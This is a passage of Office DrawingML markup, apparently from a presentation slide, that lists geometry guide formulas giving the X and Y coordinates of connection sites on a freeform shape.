              <a:gd name="connsiteY91" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 725908 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3851605 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 774383 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3381564 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 774870 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 2182937 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY18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19554 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 704810 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 705959 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 704535 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 700443 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 4010511 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 698282 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3998331 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 690830 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 725908 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3851605 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 774383 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3381564 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 774870 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 2182937 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY18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19554 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 704810 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 705959 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 704535 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 700443 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 4010511 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 698282 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3998331 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 690830 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 721941 w 1605470"/>
